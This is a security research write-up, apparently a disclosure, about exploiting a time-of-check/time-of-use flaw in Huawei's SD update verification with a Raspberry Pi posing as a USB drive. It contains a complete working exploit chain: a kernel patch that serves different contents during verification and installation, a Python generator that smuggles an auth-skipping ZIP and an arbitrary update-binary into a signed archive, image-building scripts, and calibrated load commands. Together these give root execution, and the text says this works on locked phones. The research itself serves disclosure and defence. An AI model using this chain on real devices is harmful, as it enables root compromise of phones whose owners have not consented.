@@ -2770,11 +2808,13 @@ int fsg_common_create_lun(struct fsg_common *common, struct fsg_lun_config *cfg,
p = "(error)";
}
}
- pr_info("LUN: %s%s%sfile: %s\n",
+ pr_info("LUN: %s%s%sfile: %s trigger:%d@0x%llx payload:[0x%llx;0x%llx)\n",
lun->removable ? "removable " : "",
lun->ro ? "read only " : "",
lun->cdrom ? "CD-ROM " : "",
- p);
+ p,
+ lun->trigger_counter, lun->trigger_offset,
+ lun->payload_offset, lun->payload_offset+lun->payload_size);
kfree(pathbuf);
return 0;
@@ -3333,6 +3373,9 @@ static struct usb_function_instance *fsg_alloc_inst(void)
goto release_common;
pr_info(FSG_DRIVER_DESC ", version: " FSG_DRIVER_VERSION "\n");
+ pr_info("***********************************\n");
+ pr_info("* Patched for ToC-ToU exploration *\n");
+ pr_info("***********************************\n");
memset(&config, 0, sizeof(config));
config.removable = true;
@@ -3428,6 +3471,12 @@ void fsg_config_from_params(struct fsg_config *cfg,
params->file_count > i && params->file[i][0]
? params->file[i]
: NULL;
+
+ /* ToC-ToU patch */
+ lun->trigger_counter = params->trigger_counter[i];
+ lun->trigger_offset = params->trigger_offset[i];
+ lun->payload_offset = params->payload_offset[i];
+ lun->payload_size = params->payload_size[i];
}
/* Let MSF use defaults */
diff --git a/drivers/usb/gadget/function/f_mass_storage.h b/drivers/usb/gadget/function/f_mass_storage.h
index 3b8c4ce2a..1e13a2177 100644
--- a/drivers/usb/gadget/function/f_mass_storage.h
+++ b/drivers/usb/gadget/function/f_mass_storage.h
@@ -16,6 +16,15 @@ struct fsg_module_parameters {
unsigned int nofua_count;
unsigned int luns; /* nluns */
bool stall; /* can_stall */
+
+ /* ToC-ToU patch */
+ int trigger_counter[FSG_MAX_LUNS];
+ loff_t trigger_offset[FSG_MAX_LUNS];
+ loff_t payload_offset[FSG_MAX_LUNS];
+ loff_t payload_size[FSG_MAX_LUNS];
+ unsigned int trigger_counter_count, trigger_offset_count;
+ unsigned int payload_offset_count, payload_size_count;
+
};
#define _FSG_MODULE_PARAM_ARRAY(prefix, params, name, type, desc) \
@@ -40,6 +49,14 @@ struct fsg_module_parameters {
"true to simulate CD-ROM instead of disk"); \
_FSG_MODULE_PARAM_ARRAY(prefix, params, nofua, bool, \
"true to ignore SCSI WRITE(10,12) FUA bit"); \
+ _FSG_MODULE_PARAM_ARRAY(prefix, params, trigger_counter, int, \
+ "The number of masking the payload area with zeros"); \
+ _FSG_MODULE_PARAM_ARRAY(prefix, params, trigger_offset, ullong, \
+ "Byte offset of the trigger area"); \
+ _FSG_MODULE_PARAM_ARRAY(prefix, params, payload_offset, ullong, \
+ "Byte offset of the payload area"); \
+ _FSG_MODULE_PARAM_ARRAY(prefix, params, payload_size, ullong, \
+ "Byte size of the payload area"); \
_FSG_MODULE_PARAM(prefix, params, luns, uint, \
"number of LUNs"); \
_FSG_MODULE_PARAM(prefix, params, stall, bool, \
@@ -91,6 +108,12 @@ struct fsg_lun_config {
char cdrom;
char nofua;
char inquiry_string[INQUIRY_STRING_LEN];
+
+ /* ToC-ToU patch */
+ int trigger_counter;
+ loff_t trigger_offset;
+ loff_t payload_offset;
+ loff_t payload_size;
};
struct fsg_config {
diff --git a/drivers/usb/gadget/function/storage_common.h b/drivers/usb/gadget/function/storage_common.h
index bdeb1e233..84576bfcb 100644
--- a/drivers/usb/gadget/function/storage_common.h
+++ b/drivers/usb/gadget/function/storage_common.h
@@ -120,6 +120,12 @@ struct fsg_lun {
const char *name; /* "lun.name" */
const char **name_pfx; /* "function.name" */
char inquiry_string[INQUIRY_STRING_LEN];
+
+ /* ToC-ToU patch */
+ int trigger_counter;
+ loff_t trigger_offset;
+ loff_t payload_offset;
+ loff_t payload_size;
};
static inline bool fsg_lun_is_open(struct fsg_lun *curlun)
We did the kernel compilation off-target, on an x86 Ubuntu 22.04 machine, so a cross-compilation environment was needed.
Acquiring the kernel sources (we used commit a90c1b9c) and applying the mass storage patch:
sudo apt install git bc bison flex libssl-dev make libc6-dev libncurses5-dev
sudo apt install crossbuild-essential-arm64
mkdir linux
cd linux
git init
git remote add origin https://github.com/raspberrypi/linux
git fetch --depth 1 origin a90c1b9c7da585b818e677cbd8c0b083bed42c4d
git reset --hard FETCH_HEAD
git apply < ../mass_storage_patch.diff
For the kernel config we use the Raspberry Pi 4 specific defconfig. The default kernel configuration contains a multitude of unnecessary modules; they could be trimmed down quite a bit.
KERNEL=kernel8
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- bcm2711_defconfig
make -j8 ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- Image modules dtbs
After building the kernel, we copy the products to the SD card:
mount /dev/mmcblk0p1 /mnt/boot
mount /dev/mmcblk0p2 /mnt/root
mv /mnt/boot/kernel8.img /mnt/boot/kernel8-backup.img
mv /mnt/boot/overlays/ /mnt/boot/overlays_backup
mkdir /mnt/boot/overlays/
cp arch/arm64/boot/Image /mnt/boot/kernel8.img
cp arch/arm64/boot/dts/broadcom/*.dtb /mnt/boot/
cp arch/arm64/boot/dts/overlays/*.dtb* /mnt/boot/overlays/
cp arch/arm64/boot/dts/overlays/README /mnt/boot/overlays/
PATH=$PATH make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- INSTALL_MOD_PATH=/mnt/root modules_install
umount /dev/mmcblk0p1
umount /dev/mmcblk0p2
Finally we put the SD card back into the RPi and boot it.
Crafting the Update Archive
Recall that we have three phases of the update process, separated by the mount actions: the first checks the software version for compatibility of the update with the device, the second verifies the update cryptographically, and the third applies the update. We are going to construct a “frankenZIP” update archive which, with the help of our FaultyUSB, presents itself differently in each update phase to achieve our goal.
It may seem logical at first that in the first two steps (compatibility check, signature verification) we can use the same archive, since we just need a valid update archive that is both signed and has a matching version for the given device. However, the second phase of the update process is actually more convoluted, as it performs multiple sub-checks: in addition to the Android-specific update signature verification, there is another important part of the verification stage, which is the authentication token checking.
The authentication token is a cryptographically signed token that is infeasible to forge, but it only applies to OTA update archives; SD-type updates are not checked for auth tokens. SD updates are most likely meant to be installed locally, e.g. literally from an SD card, so there is no Huawei server involved in approving the update process and issuing an auth token.
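Based on the call tree above, the auth-token exemption can be approximated like this (our reconstruction for illustration, not verbatim decompiled code): a package that identifies itself as an SD update, or that carries a skipauth_pkg.tag entry, is not subjected to auth-token verification.
# Rough reconstruction of the IsUnauthPkg logic from the call tree above
# (approximation for illustration, not verbatim decompiled code).
def is_unauth_pkg(zip_entries: set) -> bool:
    if "SD_update.tag" in zip_entries:        # IsSDupdatePackageCompress path
        return True
    return "skipauth_pkg.tag" in zip_entries  # explicit auth-skip marker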
It is possible to find an OTA update archive for a specific device, because end users must be able to update their phones, so there has to be a way to publicly access OTA updates.
Unfortunately, SD updates are more difficult to find; we only managed to find a few model-version combinations on Android file hosting sites.
Analyzing update archives of different types and versions, we found that Huawei uses the so-called hotakey_v2 RSA key across a broad range of devices as the Android-specific signing key: both an SD update for LIO on EMUI 11 and the latest HarmonyOS updates for NOH are signed with this key.
This means that an update archive for a different model and an older OS version may still pass the cryptographic verification even on devices running a fresh HarmonyOS version.
Also, there are some recent changes in the update archive content: the newer update archives (both OTA and SD) have begun to utilize the packageinfo.mbn version description file, which is also checked during the verification stage.
If this file exists, a more thorough version-compatibility test is performed: e.g. when it defines an “Upgrade” field and the installed OS has a greater version number than the update, the update process is aborted.
However, the check is skipped if this file is missing, which is exactly the case with pre-HarmonyOS updates: e.g. the EMUI 11 SD update archives don’t have the packageinfo.mbn file.
Solving all those constraints, we were eventually able to find a publicly available file on a firmware sharing site (named Huawei Mate 30 Pro Lion-L29 hw eu LIO-L29 11.0.0.220(C432E7R8P4)_Firmware_EMUI11.0.0_05016HEY.zip), which contains the SD update of the LIO-L29 11.0.0.220 version.
There are three ZIP files in an SD update: the base, the preload, and the cust package. Each of them is signed.
We selected the cust package as the foundation of the PoC because of its tiny (14 KB) size.
This file is perfect for the second phase of the update (verification), but it obviously does not contain the correct SOFTWARE_VER_LIST.mbn for our target devices.
That’s why the exploit has to present the external media differently between phases 1 and 2 as well: in the first phase we will present a variant that has the desired SOFTWARE_VER_LIST.mbn, while in the second phase we will present the previously mentioned EMUI 11 SD update archive, which not only passes signature verification but also bypasses the authentication token and the packageinfo requirement.
However, this original archive file is not used exactly “as-is” for phase two: we must make a change to it so that it still passes verification in phase two while also containing the arbitrary binary to be executed in the third phase (code execution).
Creating such a static “frankenZIP” that can produce multiple contents depending on the update stage was the main point of our previous publication - see the UnZiploc presentation on exploiting CVE-2021-40045. The key to it is the way the parsing algorithm of the Android-specific signature footer works. The implementation still enables us to make a gap between the end of the actual ZIP file and the beginning of the whole-file PKCS#7 signature. This gap is a no man’s land in the sense that ZIP parsers skip it, as it is technically part of the ZIP comment field; likewise, the signature verifier also skips it, because the signature field is aligned to the end of the file. However (and this is why we needed a new vulnerability compared to the previous report), statically smuggling a ZIP file inside the gap area would no longer be possible, since the fix Huawei employed, i.e. searching for the ZIP End of Central Directory marker in the archive’s comment field, is an effective mitigation.
This EOCD search happens in the verification phase, just before the Android-specific signature checking. This means that during the verification phase a pristine update archive must be presented (apart from the fact that it is still possible to create a gap between the signature and the end of the ZIP data).
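Conceptually, the mitigation amounts to scanning the comment/gap area for a second End of Central Directory signature and rejecting the package if one is found; something along these lines (our approximation, not Huawei’s actual code):
# Approximation of Huawei's EOCD-search mitigation (illustration only): if a
# second "PK\x05\x06" marker shows up inside the comment/gap area, a smuggled
# ZIP is present and the package is rejected. Zero-masking the gap during the
# verification phase makes this scan come up empty.
EOCD_MAGIC = b"PK\x05\x06"

def comment_area_is_clean(comment_area: bytes) -> bool:
    return EOCD_MAGIC not in comment_area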
Therefore, the idea is to utilize the patched mass storage functionality of the Linux kernel to hide the injected ZIP inside the update archive exactly while the update process is in the verification phase.
This is done by masking the payload area with zeros, so when a read access occurs at the end of the ZIP file during the EOCD search of the verification process, the phone reads zeros in the no man’s land and the new fix does not trigger an assertion.
However, when the ZIP file is read again in the third phase, the smuggled content is provided and therefore (similarly to the previous vulnerability) the modified update-binary ends up being executed.
The content of the crafted ZIP file can be restricted to a minimal file set: only those entries which are essential to pass the sanity (META-INF/CERT.RSA, SD_update.tag) and version (SOFTWARE_VER_LIST.mbn) checks during the update process.
The supported models depend on the content of the SOFTWARE_VER_LIST.mbn file, which lists model codenames, geographical revisions, and the minimum supported firmware version.
The update-binary contains the arbitrary code that will be executed.
Here is the ZIP-smuggling generator (smuggle_zip_inplace.py), which takes a legitimately signed ZIP archive as a base and injects into it the previously discussed minimal file set and a custom binary to be executed.
import argparse
import struct
import zipfile
import io
import os
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="poc update.zip repacker")
    parser.add_argument("file", type=argparse.FileType("r+b"), help="update.zip file to be modified")
    parser.add_argument("update_binary", type=argparse.FileType("rb"), help="update binary to be injected")
    parser.add_argument("-g", "--gap", default="-1", help="gap between EOCD and signature (-1: maximum)")
    parser.add_argument("-o", "--ofs", default="-1", help="payload offset in the gap")
    args = parser.parse_args()
    gap_size = int(args.gap, 0)
    payload_ofs = int(args.ofs, 0)
    args.file.seek(0, os.SEEK_END)
    original_size = args.file.tell()
    args.file.seek(-6, os.SEEK_END)
    signature_size, magic, comment_size = struct.unpack("<HHH", args.file.read(6))
    assert magic == 0xffff
    print(f"comment size = {comment_size}")
    print(f"signature size = {signature_size}")
    # get the signature
    args.file.seek(-signature_size, os.SEEK_END)
    signature_data = args.file.read(signature_size - 6)
    # prepare the gap to where the payload will be placed
    # (gap is the new comment size - signature size)
    if gap_size == -1:
        gap_size = 0xffff - signature_size
    assert gap_size + signature_size <= 0xffff
    # automatically set the payload offset to be 0x1000-byte aligned
    if payload_ofs == -1:
        payload_ofs = (comment_size - original_size) & 0xfff
    print(f"gap size = {gap_size}")
    print(f"payload offset = {payload_ofs}")
    # truncate the ZIP at the end of the signed data
    args.file.seek(-(comment_size + 2), os.SEEK_END)
    end_of_signed_data = args.file.tell()
    args.file.truncate(end_of_signed_data)
    # write the new (original ZIP's) EOCD according to the updated gap size
    args.file.write(struct.pack("<H", gap_size + signature_size))
    # gap before filling
    args.file.write(b"\x00"*(payload_ofs))
    # write a marker before the injected payload
    args.file.write(b"=PAYLOAD-BEGIN=\x00")
    # generate the injected ZIP payload
    z = zipfile.ZipFile(args.file, "w", compression=zipfile.ZIP_DEFLATED)
    # ensure the CERT.RSA has a proper length, the content is irrelevant
    z.writestr("META-INF/CERT.RSA", b"A"*1300)
    # the existence of this file makes the authentication tag verification be skipped for OTA
    z.writestr("skipauth_pkg.tag", b"")
    # the update binary to be executed
    z.writestr("META-INF/com/google/android/update-binary", args.update_binary.read())
    # some more files are necessary for an "SD update"
    known_version_list = [
        b"LIO-LGRP2-OVS 102.0.0.1",
        b"LIO-LGRP2-OVS 11.0.0",
        b"NOH-LGRP2-OVS 102.0.0.1",
        b"NOH-LGRP2-OVS 11.0.0",
    ]
    z.writestr("SOFTWARE_VER_LIST.mbn", b"\n".join(known_version_list)+b"\n")
    z.writestr("SD_update.tag", b"SD_PACKAGE_BASEPKG\n")
    z.close()
    # write a marker after the injected payload
    args.file.write(b"==PAYLOAD-END==\x00")
    payload_size = args.file.tell() - (end_of_signed_data + 2) - payload_ofs
    assert payload_size + payload_ofs < gap_size, f"{payload_size} + {payload_ofs} < {gap_size}"
    # gap after filling
    args.file.write(b"\x00"*(gap_size - payload_ofs - payload_size))
    # signature
    args.file.write(signature_data)
    # footer
    args.file.write(struct.pack("<HHH", signature_size, 0xffff, gap_size + signature_size))
Regarding the actual content of the PoC: because a mass storage device has no understanding of higher-level concepts such as file systems or even files, it can only operate at the raw storage level, so the output of the PoC build must in fact be a raw file system image.
Below is the file system image generation script, where the update_sd_base.zip archive is the cust part of the aforementioned LIO update and update-binary-poc is the ELF executable to be run.
The update-binary-poc is a static aarch64 ELF file, which finally gets execv()-ed by the recovery, thus reaching arbitrary code execution as root.
Also note that the output image (file_system.img) only contains a bare file system and has no partition table.
python3 smuggle_zip_inplace.py update_sd_base.zip update-binary-poc
dd if=/dev/zero of=file_system.img bs=1M count=10
mkfs.exfat file_system.img
mkdir -p mnt
sudo mount -o loop,rw,nosuid,nodev,relatime,uid=1000,gid=1000,fmask=0022,dmask=0022,iocharset=utf8 -t exfat file_system.img mnt
mkdir -p mnt/dload
dd if=/dev/zero of=mnt/padding_between_exfat_headers_and_update_archive bs=1M count=1
cp update_sd_base.zip mnt/dload/   # copy the crafted archive onto the image (dload/ assumed as the SD-update location)
sudo umount mnt
rmdir mnt
python -c 'd=open("file_system.img","rb").read();o=d.find("update_sd_base".encode("utf-16le"));b=d.find(b"=PAYLOAD-BEGIN=");e=d.find(b"==PAYLOAD-END==")+16;print(f"sudo rmmod g_mass_storage; sudo modprobe g_mass_storage file=/home/pi/file_system.img trigger_counter=4 trigger_offset=0x{o:x} payload_offset=0x{b:x} payload_size={e-b}")'
The file system is tiny, just about 10 MB in size, and formatted as exFAT. To have a proper offset distance between the file system metadata (e.g. the file node descriptor) and the actual update archive, a 1 MB zero-filled dummy file is inserted first. This is only a precaution to prevent the Linux kernel from caching the beginning of the update archive when it reads the file system metadata.
The final step of the PoC build process automatically constructs the command that loads the patched mass storage module with the correct trigger and payload parameters.
The trigger condition is defined as a read of the file node descriptor of the update_sd_base.zip file, because the file path of the update archive must be resolved into a file node by the file system, so the file metadata must be read before the actual file content.
The trigger counter parameter is an empirically set constant, based on the observed number of mount events, directory listings and file stats prior to the verification stage.
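The constant is straightforward to calibrate: the LINFO lines added by the kernel patch log every read with its offset and size, so a dry run (with a trigger counter high enough that the mask never activates) lets us count how many accesses hit the trigger offset before the verification stage. A small helper along these lines can do the counting (hypothetical convenience script; assumes the patched module’s log lines are visible in dmesg on the RPi):
# Hypothetical calibration helper: count the reads that touched the trigger
# offset during a dry run, using the "READ A=0x... S=0x..." lines emitted by
# the patched f_mass_storage module.
import re
import subprocess

TRIGGER_OFFSET = 0x204042  # value printed by the PoC build for our image

log = subprocess.run(["dmesg"], capture_output=True, text=True).stdout
hits = 0
for m in re.finditer(r"READ A=0x([0-9a-f]+) S=0x([0-9a-f]+)", log):
    offset, size = int(m.group(1), 16), int(m.group(2), 16)
    if offset <= TRIGGER_OFFSET < offset + size:
        hits += 1
print(f"{hits} reads touched the trigger offset")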
Leveraging Arbitrary Code Execution
Gaining root-level code execution is nice, and normally one would like to open a reverse shell to make use of it, but the recovery mode in which the update runs is a very restricted environment in terms of external connections. However, as we already detailed in the UnZiploc presentation last year, the recovery mode can by design use WiFi to implement a “phone disaster recovery” feature, in which it downloads the OTA over the internet directly from the recovery. So we could make use of the WiFi chip to connect to our AP and thus make the reverse shell possible. The exact PoC code is not disclosed here; it is left as an exercise for the reader :)
Running the PoC
After building the PoC, the resulting file system image is transferred to the Raspberry Pi and then loaded by the USB mass storage kernel module on the RPi, e.g.:
sudo rmmod g_mass_storage
sudo modprobe g_mass_storage \
file=/home/pi/file_system.img \
trigger_counter=4 trigger_offset=0x204042 \
payload_offset=0x308000 payload_size=3672
Then we connect the RPi with the target phone with the USB-C cable and simply trigger the update process. This can be done in different ways, depending on the lock state of the device.
If the phone is unlocked (i.e. you are trying to root your own phone :), once the phone recognizes the USB device, a notification appears and the file explorer can now list the content of our 10 MB emulated flash drive.
Then the dialer can be used to access the ProjectMenu application by dialing *#*#2846579#*#* (or, in case of a tablet, use the calculator in landscape mode and enter ()()2846579()()), then select “4. Software Upgrade”, and then “1. Memory card Upgrade”.
More interestingly, if the phone credentials are not known, so the screen can’t be unlocked to access the ProjectMenu application, the SD update method is still reachable via the eRecovery menu, by powering the phone on while pressing the Power and Volume Up buttons.
Because the trigger counter can be left in an indeterminate state after normal-mode Android has read the external media, it is very important to execute the same kernel module unload and load commands again while the phone reboots! This way the trigger counter is only affected by the update process, so it fires at the right moment.
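Since this re-arm step is easy to forget, a trivial helper (hypothetical convenience script, run on the RPi over SSH right as the phone starts rebooting) can reload the gadget with the parameters produced by the PoC build:
# Hypothetical convenience helper: reload g_mass_storage with the parameters
# printed by the PoC build, so the trigger counter starts from a known state.
import subprocess

PARAMS = ["file=/home/pi/file_system.img", "trigger_counter=4",
          "trigger_offset=0x204042", "payload_offset=0x308000", "payload_size=3672"]

subprocess.run(["sudo", "rmmod", "g_mass_storage"], check=False)  # ignore if not loaded
subprocess.run(["sudo", "modprobe", "g_mass_storage"] + PARAMS, check=True)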
The update process itself should be fairly quick, as the whole archive is just a few kilobytes, so the PoC code gets executed within a few seconds of entering recovery mode.
To close things out, here is a video capture of the exploit :)